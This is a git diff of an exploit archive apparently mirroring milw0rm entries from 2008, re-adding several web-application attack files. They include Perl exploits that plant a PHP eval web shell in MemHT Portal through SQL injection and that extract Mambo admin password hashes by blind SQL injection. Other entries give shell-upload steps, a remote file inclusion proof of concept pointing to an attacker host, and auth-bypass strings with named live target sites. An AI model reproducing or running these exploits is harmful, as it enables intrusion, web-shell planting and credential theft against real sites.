"HEAD $path$def_shell HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - - $rcvd = send_pckt($host, $packet, 1); - if( ! 
$rcvd) { - print "\n\tUnable to connect to $host\n\n"; - exit; - } - - if( $rcvd =~ /200\s+OK/ ) { - print "\n\tExploited:\t http://$host$path$def_shell\n\n"; - } else { - print "\n\tExploiting failed.\n\n"; - } - -} - -sub send_pckt() { - - my $dat; - my ($host, $packet, $ret) = @_; - my $socket = IO::Socket::INET->new( - Proto => 'tcp', - PeerAddr => $host, - PeerPort => 80 - ); - if( ! $socket) { - return 0; - } else { - - print $socket $packet; - if( $ret ) { - local $/; - $dat = <$socket>; - } - close $socket; - return $dat; - } -} - -sub usage { - print "\n\tUsage:\t$0 http://site.com [-b|full server path] - - By default exlpoit checks /lang/english.php for errors to get real path. - If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ). - - Example:\t$0 http://localhost/ /var/www/htdocs - $0 http://localhost/ -b - $0 http://localhost/\n\n"; - exit; -} - -# milw0rm.com [2008-11-08] +#!/usr/bin/perl + +=about + + MemHT Portal <= 4.0 Perl exploit + + AUTHOR: + Discovered and written by Ams + ax330d [doggy] gmail [dot] com + + DESCRIPTION: + Here we are able to make SQL-injection due to weak filtering. + So, look at inc/inc_header.php lines ~ 74, where hides code + $checktitle = (isset($_GET['title'])) ? urldecode(inCode($_GET['title'])) : "" ; + We can easily bypass this check. And look again at lines + ~ 67 in inc/inc_fnctions.php, - this is not that best solution. + + This exploit provides simple shell. 
+ + REQUIREMENTS: + MySQL should be able to write to file + Know full server path to portal + +=cut + +use strict; +use warnings; +use IO::Socket; + +print " + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + MemHT portal <= 4.0 Perl exploit + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + "; + +my $expl_url = shift or &usage; +my $serv_path = shift || '-b'; +my $def_shell = '/uploads/file/files.php'; +# Simple concept shell +my $shell = '%253C%253Fphp%2520@eval%2528%2524_GET%255Bcmd%255D%2529%253B'; + +my @paths = qw( + /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts + /home/www /home/httpd/vhosts + /usr/local/apache/htdocs + /www/htdocs +); + +@paths = ( $serv_path ) unless $serv_path eq '-b'; + +exploit( $expl_url ); + +sub exploit { + + # Defining vars. + $_ = shift; + $_ .= '/' unless substr($_, -1) eq '/'; + print "\n\tExploiting:\t $_\n"; + + my($packet, $rcvd); + my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; + + # Trying to get /lang/english.php to get server path + $packet = "POST $path/lang/english.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; + $rcvd = send_pckt($host, $packet, 1); + + die "\n\tUnable to connect to $host!\n\n" unless $rcvd; + + if( $rcvd =~ /Undefined variable:/ ) { + @paths = ($rcvd =~ m#\s+in\s+(.*?)${path}lang/english.php#); + print "\n\tFound path:\t $paths[-1]\n"; + } else { + print "\n\tStarting bruteforce...\n"; + } + + # Some bruteforce here + for $serv_path ( @paths ) { + + # Poisoned request + my $injection + = "page=articles&id=-1&op=readArticle&title=one%2527%2520UNION+SELECT+1%2C2%2C%2527$shell%2527+INTO+OUTFILE+%2527$serv_path$path$def_shell%2527--\%2520"; + + print "\n\tTesting:\t $serv_path$path$def_shell ...\n"; + $packet = "GET $path/index.php?$injection HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: 
Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; + + send_pckt($host, $packet, 1) or die "\n\tUnable to connect to http://$host!\n\n"; + } + + # Checking for shell presence + $packet = "HEAD $path$def_shell HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; + + $rcvd = send_pckt($host, $packet, 1); + if( ! $rcvd) { + print "\n\tUnable to connect to $host\n\n"; + exit; + } + + if( $rcvd =~ /200\s+OK/ ) { + print "\n\tExploited:\t http://$host$path$def_shell\n\n"; + } else { + print "\n\tExploiting failed.\n\n"; + } + +} + +sub send_pckt() { + + my $dat; + my ($host, $packet, $ret) = @_; + my $socket = IO::Socket::INET->new( + Proto => 'tcp', + PeerAddr => $host, + PeerPort => 80 + ); + if( ! $socket) { + return 0; + } else { + + print $socket $packet; + if( $ret ) { + local $/; + $dat = <$socket>; + } + close $socket; + return $dat; + } +} + +sub usage { + print "\n\tUsage:\t$0 http://site.com [-b|full server path] + + By default exlpoit checks /lang/english.php for errors to get real path. + If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ). + + Example:\t$0 http://localhost/ /var/www/htdocs + $0 http://localhost/ -b + $0 http://localhost/\n\n"; + exit; +} + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7058.txt b/platforms/php/webapps/7058.txt index f3476766f..bbbf18a4a 100755 --- a/platforms/php/webapps/7058.txt +++ b/platforms/php/webapps/7058.txt 
@@ -1,63 +1,63 @@ -ZEEPROPERTY v1.0 remote file Upload & XSS - -author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -dork: "Designed & Developed by Zeeways.com" - - -first register to site - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - - -after login to site and you change your profile ( direckt link: localhost/viewprofile.php ) - -add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties - -copy photo link and paste your explorer go your shell - -your_shell: - -localhost/script_path/companylogo/[id].php - - -example for demo: - -user: zeeways - -passwd: testing: - -change profile direckt link: http://www.zeeproperty.com/viewprofile.php - -and your_shell link: - -http://www.zeeproperty.com/companylogo/5622365.php - - -XSS for demo: - -http://www.zeeproperty.com/view_prop_details.php?propid="> - - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-08] +ZEEPROPERTY v1.0 remote file Upload & XSS + +author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +dork: "Designed & Developed by Zeeways.com" + + +first register to site + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + + +after login to site and you change your profile ( direckt link: localhost/viewprofile.php ) + +add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties + +copy photo link and paste your explorer go your shell + +your_shell: + +localhost/script_path/companylogo/[id].php + + +example for demo: + +user: zeeways + +passwd: testing: + +change profile direckt link: http://www.zeeproperty.com/viewprofile.php + +and your_shell link: + +http://www.zeeproperty.com/companylogo/5622365.php + + +XSS for demo: + +http://www.zeeproperty.com/view_prop_details.php?propid="> + + +thanks: str0ke & 
yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7059.txt b/platforms/php/webapps/7059.txt index 3f4545243..326401ed9 100755 --- a/platforms/php/webapps/7059.txt +++ b/platforms/php/webapps/7059.txt @@ -1,57 +1,57 @@ -########################## www.BugReport.ir ######################### -# -# AmnPardaz Security Research Team -# -# Title: Enthusiast 3 Remote Code Execution -# Vendor: http://scripts.indisguise.org/enthusiast/ -# Bug: File Inclusion -# Vulnerable Version: 3.1.4 (prior versions also may be affected) -# Exploitation: Remote with browser -# Fix: N/A -# Original Advisory: http://www.bugreport.ir/index_57.htm -################################################################### - - -#################### -- Description: -#################### - -Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily - -customizable for other types of listings as well?cliques, physical listings, taboo listings, and the like. - - -#################### -- Vulnerability: -#################### - -+--> File Inclusion - -When register_globals is enabled, Its possible to include arbitrary files from local or remote resources. - -#################### -- Code Snippet: -#################### -/show_joined.php #line:261-264 - -

    -Powered by Enthusiast - -

    - -#################### -- Exploits/POCs: -#################### - -POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/ (this one includes show_enthversion.php from evilsite) -POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00 (this requiers magic_quotes_gpc to be disabled) - -#################### -- Credit : -#################### -AmnPardaz Security Research Team -Contact: admin[4t}bugreport{d0t]ir -www.BugReport.ir -www.AmnPardaz.comz - -# milw0rm.com [2008-11-08] +########################## www.BugReport.ir ######################### +# +# AmnPardaz Security Research Team +# +# Title: Enthusiast 3 Remote Code Execution +# Vendor: http://scripts.indisguise.org/enthusiast/ +# Bug: File Inclusion +# Vulnerable Version: 3.1.4 (prior versions also may be affected) +# Exploitation: Remote with browser +# Fix: N/A +# Original Advisory: http://www.bugreport.ir/index_57.htm +################################################################### + + +#################### +- Description: +#################### + +Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily + +customizable for other types of listings as well?cliques, physical listings, taboo listings, and the like. + + +#################### +- Vulnerability: +#################### + ++--> File Inclusion + +When register_globals is enabled, Its possible to include arbitrary files from local or remote resources. + +#################### +- Code Snippet: +#################### +/show_joined.php #line:261-264 + +

    +Powered by Enthusiast + +

    + +#################### +- Exploits/POCs: +#################### + +POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/ (this one includes show_enthversion.php from evilsite) +POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00 (this requiers magic_quotes_gpc to be disabled) + +#################### +- Credit : +#################### +AmnPardaz Security Research Team +Contact: admin[4t}bugreport{d0t]ir +www.BugReport.ir +www.AmnPardaz.comz + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7062.txt b/platforms/php/webapps/7062.txt index 687dfa31d..0ab02a0c0 100755 --- a/platforms/php/webapps/7062.txt +++ b/platforms/php/webapps/7062.txt 
@@ -1,64 +1,64 @@ -ZEEJOBSITE v2.0 remote file Upload - -author: ZoRLu msn: trt-turk@hotmail.com - -home: www.z0rlu.blogspot.com - -dork: "Copyright-2008@zeejobsite.com" - -date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) ) - - -first register to site - -you add this code your shell to head - -GIF89a; - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php - - -after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php ) - -and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] ) - -add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties - -copy photo link and paste your explorer go your shell - -your_shell: - -localhost/script_path/jobseekers/logos/[id].php - - -example for demo: - -user: sabrina - -passwd: testing: - -login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php - -change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47 - -and your_shell link: - -http://zeejobsite.com/jobseekers/logos/7271406.php - - -thanks: str0ke & yildirimordulari.org & darkc0de.com - -# milw0rm.com [2008-11-08] +ZEEJOBSITE v2.0 remote file Upload + +author: ZoRLu msn: trt-turk@hotmail.com + +home: www.z0rlu.blogspot.com + +dork: "Copyright-2008@zeejobsite.com" + +date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) ) + + +first register to site + +you add this code your shell to head + +GIF89a; + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php + + +after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php ) + +and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] ) + +add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties + +copy photo link and paste your explorer go your shell + +your_shell: + 
+localhost/script_path/jobseekers/logos/[id].php + + +example for demo: + +user: sabrina + +passwd: testing: + +login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php + +change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47 + +and your_shell link: + +http://zeejobsite.com/jobseekers/logos/7271406.php + + +thanks: str0ke & yildirimordulari.org & darkc0de.com + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7064.pl b/platforms/php/webapps/7064.pl index 912f2cba1..41ea3a16f 100755 --- a/platforms/php/webapps/7064.pl +++ b/platforms/php/webapps/7064.pl 
@@ -1,110 +1,110 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; - -if(!$ARGV[1]) -{ -system("Title Kosova Hackers Group by boom3rang"); - print " \n"; - print " #######################################################################\n"; - print " # Mambo Component n-form(form_id) Blind SQL Injection Exploit \n"; - print " # -----------------------------------------------------------\n"; - print " # Author: boom3rang [www.khg-crew.ws] \n"; - print " # Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n"; - print " # Site: www.khg-crew.ws\n"; - print " # -----------------------------------------------------------\n"; - print " # Dork : inurl:option=com_n-forms form_id \n"; - print " # Usage: perl exploit.pl host path \n"; - print " # Example: perl exploit.pl www.host.com /path/ -a 3 \n"; - print " # -----------------------------------------------------------\n"; - print " # Options: \n"; - print " # -a valid form id \n"; - print " #######################################################################\n"; - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $userid = 1; -my $aid = $ARGV[2]; - -my %options = (); -GetOptions(\%options, "u=i", "p=s", "a=i"); - -print "[~] Exploiting...\n"; - -if($options{"u"}) -{ - $userid = $options{"u"}; -} - -if($options{"a"}) -{ - $aid = $options{"a"}; -} - -syswrite(STDOUT, "[~] MD5-Hash: ", 14); - -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $path, $userid, $aid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $path, $userid, $aid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} - -print "\n[~] Exploiting done\n"; - -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $uid = shift; - my $aid = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = 
"http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h.""; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "Back"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } - -} - -# milw0rm.com [2008-11-08] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; + +if(!$ARGV[1]) +{ +system("Title Kosova Hackers Group by boom3rang"); + print " \n"; + print " #######################################################################\n"; + print " # Mambo Component n-form(form_id) Blind SQL Injection Exploit \n"; + print " # -----------------------------------------------------------\n"; + print " # Author: boom3rang [www.khg-crew.ws] \n"; + print " # Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n"; + print " # Site: www.khg-crew.ws\n"; + print " # -----------------------------------------------------------\n"; + print " # Dork : inurl:option=com_n-forms form_id \n"; + print " # Usage: perl exploit.pl host path \n"; + print " # Example: perl exploit.pl www.host.com /path/ -a 3 \n"; + print " # -----------------------------------------------------------\n"; + print " # Options: \n"; + print " # -a valid form id \n"; + print " #######################################################################\n"; + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $userid = 1; +my $aid = $ARGV[2]; + +my %options = (); +GetOptions(\%options, "u=i", "p=s", "a=i"); + +print "[~] Exploiting...\n"; + +if($options{"u"}) +{ + $userid = $options{"u"}; +} + +if($options{"a"}) +{ + $aid = $options{"a"}; +} + +syswrite(STDOUT, "[~] MD5-Hash: ", 14); + +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $userid, $aid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + 
if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $userid, $aid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} + +print "\n[~] Exploiting done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $uid = shift; + my $aid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h.""; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "Back"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } + +} + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7065.txt b/platforms/php/webapps/7065.txt index 37c2f2273..ec53db443 100755 --- a/platforms/php/webapps/7065.txt +++ b/platforms/php/webapps/7065.txt 
@@ -1,37 +1,36 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################## - # [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability # - ################################################################## - # - # Script site: http://cyberfolio.org/ - # Download: http://cyberfolio.org/Version-7-12-2 - # - # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00 - # - # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33) - # - # ... - # if (file_exists("./themes/".$_GET[theme].".php")) { - # include_once("./themes/".$_GET[theme].".php"); // LFI - # } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-11-08] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################## + # [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability # + ################################################################## + # + # Script site: http://cyberfolio.org/ + # Download: http://cyberfolio.org/Version-7-12-2 + # + # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00 + # + # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33) + # + # ... + # if (file_exists("./themes/".$_GET[theme].".php")) { + # include_once("./themes/".$_GET[theme].".php"); // LFI + # } + # ... 
+ # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7066.txt b/platforms/php/webapps/7066.txt index 79d8165e8..abe17b4b4 100755 --- a/platforms/php/webapps/7066.txt +++ b/platforms/php/webapps/7066.txt 
@@ -1,53 +1,53 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Zeeways Shaadi Clone v2.0 Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ Zeeways Shaadi Clone v2.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://zeeways.com/php-software/shaadiclone-v2.0-2.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 08.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [»] http://localhost/[path]/admin/home.php - - -===[ LIVE ]=== - - [»] http://megashaadi.com/admin/home.php - [»] http://proposals.vinlak.com/admin/home.php - [»] http://gmatrimonial.com/admin/home.php - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-08] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Zeeways Shaadi Clone v2.0 Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ Zeeways Shaadi Clone v2.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://zeeways.com/php-software/shaadiclone-v2.0-2.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 08.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [»] http://localhost/[path]/admin/home.php + + +===[ LIVE ]=== + + [»] http://megashaadi.com/admin/home.php + [»] http://proposals.vinlak.com/admin/home.php + [»] http://gmatrimonial.com/admin/home.php + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7068.txt b/platforms/php/webapps/7068.txt index d68096fab..0b22f7422 100755 --- a/platforms/php/webapps/7068.txt +++ b/platforms/php/webapps/7068.txt 
@@ -1,67 +1,67 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -*********************************************************************************************************************************************************** - +---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [Mole Group Airline Ticket Script(Auth Bypass) SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.mole-group.com ¦ ¦ ![ ]! ¦ -¦ Download : http://www.mole-group.com/content/view/57/72/ ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. 
¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -Bypass : ........ - -Go To The Admin Panel. -and Login with this information : - -username : admin ' or ' 1=1 -password : Cyber-Zone or any thing you want :) - -yeah bro you loged in dont worry :) - -and this is a live demo : -http://airline.mole-group.com/admin/ - -EnjoY. - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-08] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] 
O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +*********************************************************************************************************************************************************** + +---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [Mole Group Airline Ticket Script(Auth Bypass) SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek ) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.mole-group.com ¦ ¦ ![ ]! ¦ +¦ Download : http://www.mole-group.com/content/view/57/72/ ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] 
++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +Bypass : ........ + +Go To The Admin Panel. +and Login with this information : + +username : admin ' or ' 1=1 +password : Cyber-Zone or any thing you want :) + +yeah bro you loged in dont worry :) + +and this is a live demo : +http://airline.mole-group.com/admin/ + +EnjoY. + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7070.txt b/platforms/php/webapps/7070.txt index fc76d361f..0bfb31a1c 100755 --- a/platforms/php/webapps/7070.txt +++ b/platforms/php/webapps/7070.txt 
@@ -1,14 +1,14 @@ -============================================================================== - Zeeways PHOTOVIDEOTUBE v1.1 Auth Bypass Vulnerability -============================================================================== - [»] Script : [ Zeeways PHOTOVIDEOTUBE v1.1 ] - [»] Language: [ PHP ] - [»] Website : [ http://zeeways.com/php-software/photovideotube-v1.1.html ] - [»] Discover: [ Mountassif Moad ] -===[ XPL ]=== - [»] http://localhost/[path]/admin/home.php - -===[ LIVE ]=== - [»] http://www.photovideotube.com/admin//main.php - -# milw0rm.com [2008-11-08] +============================================================================== + Zeeways PHOTOVIDEOTUBE v1.1 Auth Bypass Vulnerability +============================================================================== + [»] Script : [ Zeeways PHOTOVIDEOTUBE v1.1 ] + [»] Language: [ PHP ] + [»] Website : [ http://zeeways.com/php-software/photovideotube-v1.1.html ] + [»] Discover: [ Mountassif Moad ] +===[ XPL ]=== + [»] http://localhost/[path]/admin/home.php + +===[ LIVE ]=== + [»] http://www.photovideotube.com/admin//main.php + +# milw0rm.com [2008-11-08] diff --git a/platforms/php/webapps/7071.txt b/platforms/php/webapps/7071.txt index d42a73c6a..0aa399d90 100755 --- a/platforms/php/webapps/7071.txt +++ b/platforms/php/webapps/7071.txt 
